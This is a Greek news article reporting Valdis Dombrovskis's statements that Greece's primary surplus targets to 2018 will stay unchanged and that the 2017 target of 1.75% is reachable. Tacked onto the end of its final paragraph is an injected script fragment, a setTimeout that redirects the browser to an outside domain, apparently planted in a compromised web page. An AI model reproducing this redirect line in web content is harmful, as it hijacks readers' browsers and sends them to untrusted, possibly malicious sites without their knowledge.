Ντομπρόβσκις: Δεν αλλάζουν οι στόχοι για το πρωτογενές πλεόνασμα μέχρι το 2018

0
5

 

«Φρένο» στα σενάρια περί αναπροσαρμογής των στόχων του πρωτογενούς πλεονάσματος έως το 2018 βάζει ο αντιπρόεδρος της Ευρωπαϊκής Επιτροπής Βάλντις Ντομπρόβσκις, εκφράζοντας την εκτίμηση ότι η Αθήνα μπορεί να «πιάσει» τον στόχο του 1,75% για το 2017.

Μιλώντας στο πρακτορείο MNI, ο κ. Ντομπρόβσκις τόνισε ότι οι απαισιόδοξες προβλέψεις του ΔΝΤ δεν δικαιολογούνται, ωστόσο πρόσθεσε ότι η Ε.Ε. εργάζεται εκτιμώντας πως το ΔΝΤ θα συμμετάσχει ενεργά στο τρίτο ελληνικό πρόγραμμα.

Πάντως, σε ό,τι αφορά τη συμμετοχή του ΔΝΤ, ο κ. Ντομπρόβσκις παραδέχθηκε ότι η έκθεση βιωσιμότητας του χρέους παραμένει σημαντικό ζήτημα, πάνω στο οποίο πρέπει να υπάρξει συμφωνία ανάμεσα στο ταμείο και την Ε.Ε.

Ο αντιπρόεδρος της Κομισιόν χαρακτήρισε «αντιπαραγωγικό» το ενδεχόμενο αλλαγής των στόχων που έχουν τεθεί για το πρωτογενές πλεόνασμα μέχρι το 2018, υπογραμμίζοντας ότι δεν θα αλλάξουν, ενώ εξέφρασε την εκτίμηση πως η ελληνική οικονομία θα ανακάμψει αρκετά δυναμικά του χρόνου, εφόσον εφαρμοστεί το πρόγραμμα.

Μιλώντας για το χρέος, είπε ότι θα συζητηθεί στο πλαίσιο της δεύτερης αξιολόγησης, με την Κομισιόν να αναμένει κάποια βραχυπρόθεσμα μέτρα να αποσαφηνιστούν περαιτέρω. Διευκρίνισε ωστόσο ότι οι δανειστές είναι εκείνοι που θα λάβουν τις οριστικές αποφάσεις.

Ο αντιπρόεδρος της Κομισιόν αναφέρθηκε και στη δεύτερη αξιολόγηση, κάνοντας λόγο για «αρκετά ανοιχτά ζητήματα», μεταξύ των οποίων οι μεταρρυθμίσεις στην αγορά εργασίας. Επέμεινε, ωστόσο, ότι ο στόχος για πρωτογενές πλεόνασμα 1,75% το 2017 είναι εφικτός. setTimeout(«document.location.href=’http://gettop.info/kt/?53vSkc&'», delay);

ΑΦΗΣΤΕ ΜΙΑ ΑΠΑΝΤΗΣΗ

Please enter your comment!
Please enter your name here